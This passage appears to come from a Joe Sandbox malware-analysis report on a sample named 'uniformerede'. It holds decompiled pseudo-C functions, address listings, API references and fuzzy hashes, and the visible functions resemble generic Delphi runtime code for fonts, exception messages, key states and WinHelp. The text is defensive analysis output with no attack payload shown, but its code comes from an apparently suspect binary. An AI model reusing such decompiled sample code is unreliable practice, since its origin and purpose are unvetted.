                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x00478779
                                                                                                                                                                                                                            0x0047877a
                                                                                                                                                                                                                            0x00478781
                                                                                                                                                                                                                            0x00478782
                                                                                                                                                                                                                            0x00478787
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x00478746
                                                                                                                                                                                                                            0x0047874d
                                                                                                                                                                                                                            0x00478750
                                                                                                                                                                                                                            0x00478752
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x0047875c
                                                                                                                                                                                                                            0x00478761
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00478745
                                                                                                                                                                                                                            0x004784e7
                                                                                                                                                                                                                            0x004784ea
                                                                                                                                                                                                                            0x004784f8
                                                                                                                                                                                                                            0x004784fb
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x004784fd
                                                                                                                                                                                                                            0x00478501
                                                                                                                                                                                                                            0x00478510
                                                                                                                                                                                                                            0x00478513
                                                                                                                                                                                                                            0x00478519
                                                                                                                                                                                                                            0x00478533
                                                                                                                                                                                                                            0x00478537
                                                                                                                                                                                                                            0x004785ad
                                                                                                                                                                                                                            0x004785af
                                                                                                                                                                                                                            0x004785f6
                                                                                                                                                                                                                            0x004785fa
                                                                                                                                                                                                                            0x00478675
                                                                                                                                                                                                                            0x0047867f
                                                                                                                                                                                                                            0x00478682
                                                                                                                                                                                                                            0x00478686
                                                                                                                                                                                                                            0x00478688
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047868e
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047869a
                                                                                                                                                                                                                            0x0047868c
                                                                                                                                                                                                                            0x004785fc
                                                                                                                                                                                                                            0x004785ff
                                                                                                                                                                                                                            0x00478604
                                                                                                                                                                                                                            0x00478644
                                                                                                                                                                                                                            0x0047864c
                                                                                                                                                                                                                            0x00478654
                                                                                                                                                                                                                            0x0047865a
                                                                                                                                                                                                                            0x0047865d
                                                                                                                                                                                                                            0x00478666
                                                                                                                                                                                                                            0x00478669
                                                                                                                                                                                                                            0x00478606

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00478782
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                            • String ID: <~G$H
                                                                                                                                                                                                                            • API String ID: 3341692771-3576284788
                                                                                                                                                                                                                            • Opcode ID: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                                                                                                                                                                                            • Instruction ID: b8f1c08bed6d2714fac9d526e07dd471d665f945914cf58d975e5e29605529f8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ecd8712ba81d153100f6d8ed10ab1aa9da3ca18861188e6ea00d8c1b46d0990f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7B1F8B4A006099FDB14CF99C884AAEB7F1FF49314F20C56AE909AB351D738AD41CF64
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                                                                                            			E00424E24(void* __eax, void* __ebx, void* __ecx) {
                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                            				struct tagLOGFONTA _v68;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            				intOrPtr _t81;
                                                                                                                                                                                                                            				void* _t107;
                                                                                                                                                                                                                            				void* _t116;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            				void* _t137;
                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                            				intOrPtr _t139;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t137 = _t138;
                                                                                                                                                                                                                            				_t139 = _t138 + 0xffffffb4;
                                                                                                                                                                                                                            				_v80 = 0;
                                                                                                                                                                                                                            				_v76 = 0;
                                                                                                                                                                                                                            				_v72 = 0;
                                                                                                                                                                                                                            				_t116 = __eax;
                                                                                                                                                                                                                            				_push(_t137);
                                                                                                                                                                                                                            				_push(0x424fad);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t139;
                                                                                                                                                                                                                            				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                                                                                                                                                                                                            					 *[fs:eax] = 0;
                                                                                                                                                                                                                            					_push(0x424fb4);
                                                                                                                                                                                                                            					return E004049E4( &_v80, 3);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t76 =  *0x49e8e0; // 0x2210a30
                                                                                                                                                                                                                            					E00424168(_t76);
                                                                                                                                                                                                                            					_push(_t137);
                                                                                                                                                                                                                            					_push(0x424f85);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t139;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                                                                                                                                                                                                            						_v68.lfHeight =  *(_v8 + 0x14);
                                                                                                                                                                                                                            						_v68.lfWidth = 0;
                                                                                                                                                                                                                            						_v68.lfEscapement = 0;
                                                                                                                                                                                                                            						_v68.lfOrientation = 0;
                                                                                                                                                                                                                            						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                                                                                                                                                                                                            							_v68.lfWeight = 0x190;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_v68.lfWeight = 0x2bc;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                                                                                                                                                                                                            						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                                                                                                                                                                                                            						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                                                                                                                                                                                                            						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                                                                                                                                                                                                            						E00404C24( &_v72, _v8 + 0x1b);
                                                                                                                                                                                                                            						if(E00408F88(_v72, "Default") != 0) {
                                                                                                                                                                                                                            							E00404C24( &_v80, _v8 + 0x1b);
                                                                                                                                                                                                                            							E0040A020( &(_v68.lfFaceName), _v80);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00404C24( &_v76, "\rMS Sans Serif");
                                                                                                                                                                                                                            							E0040A020( &(_v68.lfFaceName), _v76);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_v68.lfQuality = 0;
                                                                                                                                                                                                                            						_v68.lfOutPrecision = 0;
                                                                                                                                                                                                                            						_v68.lfClipPrecision = 0;
                                                                                                                                                                                                                            						_t107 = E00425108(_t116) - 1;
                                                                                                                                                                                                                            						if(_t107 == 0) {
                                                                                                                                                                                                                            							_v68.lfPitchAndFamily = 2;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if(_t107 == 1) {
                                                                                                                                                                                                                            								_v68.lfPitchAndFamily = 1;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_v68.lfPitchAndFamily = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_pop(_t126);
                                                                                                                                                                                                                            					 *[fs:eax] = _t126;
                                                                                                                                                                                                                            					_push(0x424f8c);
                                                                                                                                                                                                                            					_t81 =  *0x49e8e0; // 0x2210a30
                                                                                                                                                                                                                            					return E00424174(_t81);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00424168: RtlEnterCriticalSection.KERNEL32(?,004241A5), ref: 0042416C
                                                                                                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateCriticalEnterFontIndirectSection
                                                                                                                                                                                                                            • String ID: MS Sans Serif$Default
                                                                                                                                                                                                                            • API String ID: 2931345757-2137701257
                                                                                                                                                                                                                            • Opcode ID: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                                                                                                                                                                                            • Instruction ID: b3d76d3ca7c544b37bc71fdcf573607e07253616adc25b4daf7a036753d91774
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89d54db4af104641d8e73ec6089c9fc87516c81d3827a31575630f39306a7239
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16517F31B04258DFDB01DFA4D641B8DBBF6EF88304FA640AAE804A7352D3389E05DB59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E0040D5A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                                                                                                                                                                            				char _v297;
                                                                                                                                                                                                                            				char _v304;
                                                                                                                                                                                                                            				intOrPtr _v308;
                                                                                                                                                                                                                            				char _v312;
                                                                                                                                                                                                                            				char _v316;
                                                                                                                                                                                                                            				char _v320;
                                                                                                                                                                                                                            				intOrPtr _v324;
                                                                                                                                                                                                                            				char _v328;
                                                                                                                                                                                                                            				void* _v332;
                                                                                                                                                                                                                            				char _v336;
                                                                                                                                                                                                                            				char _v340;
                                                                                                                                                                                                                            				char _v344;
                                                                                                                                                                                                                            				char _v348;
                                                                                                                                                                                                                            				intOrPtr _v352;
                                                                                                                                                                                                                            				char _v356;
                                                                                                                                                                                                                            				char _v360;
                                                                                                                                                                                                                            				char _v364;
                                                                                                                                                                                                                            				void* _v368;
                                                                                                                                                                                                                            				char _v372;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t82;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t89;
                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                            				void* _t108;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            				void* _t113;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t108 = __edi;
                                                                                                                                                                                                                            				_v372 = 0;
                                                                                                                                                                                                                            				_v336 = 0;
                                                                                                                                                                                                                            				_v344 = 0;
                                                                                                                                                                                                                            				_v340 = 0;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_push(_t113);
                                                                                                                                                                                                                            				_push(0x40d75b);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t113 + 0xfffffe90;
                                                                                                                                                                                                                            				_t89 =  *((intOrPtr*)(_a4 - 4));
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                                                                                                                                                                                                            					_t52 =  *0x49dbd4; // 0x407ddc
                                                                                                                                                                                                                            					E00406A70(_t52,  &_v8);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t86 =  *0x49de48; // 0x407dd4
                                                                                                                                                                                                                            					E00406A70(_t86,  &_v8);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                                                                                                                                                                                                            				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                                                                                                                                                                                                            				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                                                                                                                                                                                                            					_v368 =  *(_t89 + 0xc);
                                                                                                                                                                                                                            					_v364 = 5;
                                                                                                                                                                                                                            					_v360 = _v8;
                                                                                                                                                                                                                            					_v356 = 0xb;
                                                                                                                                                                                                                            					_v352 = _t110;
                                                                                                                                                                                                                            					_v348 = 5;
                                                                                                                                                                                                                            					_t60 =  *0x49dbfc; // 0x407d7c
                                                                                                                                                                                                                            					E00406A70(_t60,  &_v372);
                                                                                                                                                                                                                            					E0040D180(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v332 =  *(_t89 + 0xc);
                                                                                                                                                                                                                            					_v328 = 5;
                                                                                                                                                                                                                            					E00404C30( &_v340, 0x105,  &_v297);
                                                                                                                                                                                                                            					E00409E18(_v340,  &_v336);
                                                                                                                                                                                                                            					_v324 = _v336;
                                                                                                                                                                                                                            					_v320 = 0xb;
                                                                                                                                                                                                                            					_v316 = _v8;
                                                                                                                                                                                                                            					_v312 = 0xb;
                                                                                                                                                                                                                            					_v308 = _t110;
                                                                                                                                                                                                                            					_v304 = 5;
                                                                                                                                                                                                                            					_t82 =  *0x49dcbc; // 0x407e84
                                                                                                                                                                                                                            					E00406A70(_t82,  &_v344);
                                                                                                                                                                                                                            					E0040D180(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t101);
                                                                                                                                                                                                                            				 *[fs:eax] = _t101;
                                                                                                                                                                                                                            				_push(E0040D762);
                                                                                                                                                                                                                            				E004049C0( &_v372);
                                                                                                                                                                                                                            				E004049E4( &_v344, 3);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}


                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040D75B), ref: 0040D60B
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040D75B), ref: 0040D62D
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                                                                                                                                                                            • String ID: |}@
                                                                                                                                                                                                                            • API String ID: 902310565-1323765261
                                                                                                                                                                                                                            • Opcode ID: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                                                                                                                                                                                            • Instruction ID: 969e10bc4ad112e79de870a84619b0299ea79aa46f8ff725eca5e2ac65c0a227
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 25be1960f6db36998ca4914cfa2c85f29290a83f72f346ca75a33df59a24262f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41410470D00618DFDB21DF65CC81BDAB7B4AB49304F4041FAE508AB291D778AE88CF95
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0044E02C(intOrPtr __eax, void* __edx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				signed short _v10;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				char _v17;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				intOrPtr _t48;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            				intOrPtr _t64;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t69;
                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t69 = _t71;
                                                                                                                                                                                                                            				_t72 = _t71 + 0xffffffec;
                                                                                                                                                                                                                            				_t51 = __edx;
                                                                                                                                                                                                                            				_v16 = __eax;
                                                                                                                                                                                                                            				_v10 =  *((intOrPtr*)(__edx + 4));
                                                                                                                                                                                                                            				if(_v10 == 0) {
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(GetKeyState(0x10) < 0) {
                                                                                                                                                                                                                            						_v10 = _v10 + 0x2000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(GetKeyState(0x11) < 0) {
                                                                                                                                                                                                                            						_v10 = _v10 + 0x4000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                                                                                                                                                                                                            						_v10 = _v10 + 0x8000;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                                                                                                                                                                                                            					_t34 =  *0x49ebac; // 0x2210da8
                                                                                                                                                                                                                            					E0042C30C(_t34,  &_v24);
                                                                                                                                                                                                                            					_push(_t69);
                                                                                                                                                                                                                            					_push(0x44e12a);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t72;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_v17 = 0;
                                                                                                                                                                                                                            						_v8 = E0044DD30(_v16, 2, _v10 & 0x0000ffff);
                                                                                                                                                                                                                            						if(_v8 != 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(_v24 == 0 || _v17 != 2) {
                                                                                                                                                                                                                            							_pop(_t64);
                                                                                                                                                                                                                            							 *[fs:eax] = _t64;
                                                                                                                                                                                                                            							_push(0x44e131);
                                                                                                                                                                                                                            							_t40 =  *0x49ebac; // 0x2210da8
                                                                                                                                                                                                                            							return E0042C304(_t40);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t42 =  *0x49ebac; // 0x2210da8
                                                                                                                                                                                                                            					E0042C30C(_t42,  &_v8);
                                                                                                                                                                                                                            					_push(_t69);
                                                                                                                                                                                                                            					_push(0x44e0ff);
                                                                                                                                                                                                                            					_push( *[fs:eax]);
                                                                                                                                                                                                                            					 *[fs:eax] = _t72;
                                                                                                                                                                                                                            					_v17 = E0044DED8( &_v8, 0, _t69);
                                                                                                                                                                                                                            					_pop(_t67);
                                                                                                                                                                                                                            					 *[fs:eax] = _t67;
                                                                                                                                                                                                                            					_push(0x44e106);
                                                                                                                                                                                                                            					_t48 =  *0x49ebac; // 0x2210da8
                                                                                                                                                                                                                            					return E0042C304(_t48);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L14:
                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetKeyState.USER32(00000010), ref: 0044E050
                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 0044E062
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: State
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1649606143-3916222277
                                                                                                                                                                                                                            • Opcode ID: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction ID: dd991a499b8bdb83682dc26b7e7e078d12a516ef0c40e0bf5f2210f7bad781b1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44b487c12f32330f0e2b631a448e4c074bb6be9e776f131d9141241d4ae5a6fd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D231F731A04218AFEB11DFA6E84179EB7F5FB48314F50C4BBEC00A6291E77C5A00D668
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 76%
                                                                                                                                                                                                                            			E004354E8(void* __eax, void* __ebx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				void* _t33;
                                                                                                                                                                                                                            				long _t46;
                                                                                                                                                                                                                            				CHAR* _t48;
                                                                                                                                                                                                                            				void* _t55;
                                                                                                                                                                                                                            				intOrPtr _t67;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t74 = __edi;
                                                                                                                                                                                                                            				_t78 = _t79;
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_v32 = 0;
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_t76 = __edx;
                                                                                                                                                                                                                            				_t55 = __eax;
                                                                                                                                                                                                                            				_push(_t79);
                                                                                                                                                                                                                            				_push(0x4355e0);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t79 + 0xffffffe4;
                                                                                                                                                                                                                            				_t81 = __edx;
                                                                                                                                                                                                                            				if(__edx == 0) {
                                                                                                                                                                                                                            					E0040D200(0x435088, 1);
                                                                                                                                                                                                                            					E00404378();
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v28 = _t76;
                                                                                                                                                                                                                            				_v24 = 0xb;
                                                                                                                                                                                                                            				E00435234(_t55, _t55,  &_v32, 0, _t74, _t76);
                                                                                                                                                                                                                            				_v20 = _v32;
                                                                                                                                                                                                                            				_v16 = 0xb;
                                                                                                                                                                                                                            				E0040A664("IE(AL(\"%s\",4),\"AL(\\\"%0:s\\\",3)\",\"JK(\\\"%1:s\\\",\\\"%0:s\\\")\")", 1,  &_v28,  &_v8);
                                                                                                                                                                                                                            				_t33 = E00435B78(_t55, _t74, _t78, _t81);
                                                                                                                                                                                                                            				_t82 = _t33;
                                                                                                                                                                                                                            				if(_t33 != 0) {
                                                                                                                                                                                                                            					E00435234(_t55, _t55,  &_v12, 0, _t74, _t76);
                                                                                                                                                                                                                            					if(E00435AD0(_t55, _t55, _v8, 1, _t76, _t82, 0) != 0 && _v12 != 0) {
                                                                                                                                                                                                                            						 *((char*)(_t55 + 0x10)) = 1;
                                                                                                                                                                                                                            						E00404A14(_t55 + 0x14, _v8);
                                                                                                                                                                                                                            						_t46 = E00404E80(_v8);
                                                                                                                                                                                                                            						_t48 = E00404E80(_v12);
                                                                                                                                                                                                                            						WinHelpA( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x1c)))) + 0xc))(), _t48, 0x102, _t46);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t67);
                                                                                                                                                                                                                            				 *[fs:eax] = _t67;
                                                                                                                                                                                                                            				_push(0x4355e7);
                                                                                                                                                                                                                            				E004049C0( &_v32);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")"), xrefs: 00435550
                                                                                                                                                                                                                            • hI, xrefs: 00435511
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Help
                                                                                                                                                                                                                            • String ID: IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")$hI
                                                                                                                                                                                                                            • API String ID: 2830496658-455175267
                                                                                                                                                                                                                            • Opcode ID: c86f70cb4bcd8f45d690b90ea4a5f8ae0b7854847ac278ac67c2f23580fc15e0
                                                                                                                                                                                                                            • Instruction ID: ee1a8833f3819ee9826a6e87181a8fb7dc7e8b52fcd89467c6c2dda304d0cd71
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c86f70cb4bcd8f45d690b90ea4a5f8ae0b7854847ac278ac67c2f23580fc15e0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BC3166B0A006049BDB04EFA5D885A9FB7B5AF4C304F51547EF900A7392D778AE05CB99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                            			E0045AE50(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v9;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				intOrPtr _t36;
                                                                                                                                                                                                                            				long _t41;
                                                                                                                                                                                                                            				intOrPtr _t52;
                                                                                                                                                                                                                            				intOrPtr _t66;
                                                                                                                                                                                                                            				intOrPtr* _t67;
                                                                                                                                                                                                                            				intOrPtr _t68;
                                                                                                                                                                                                                            				void* _t74;
                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t72 = __esi;
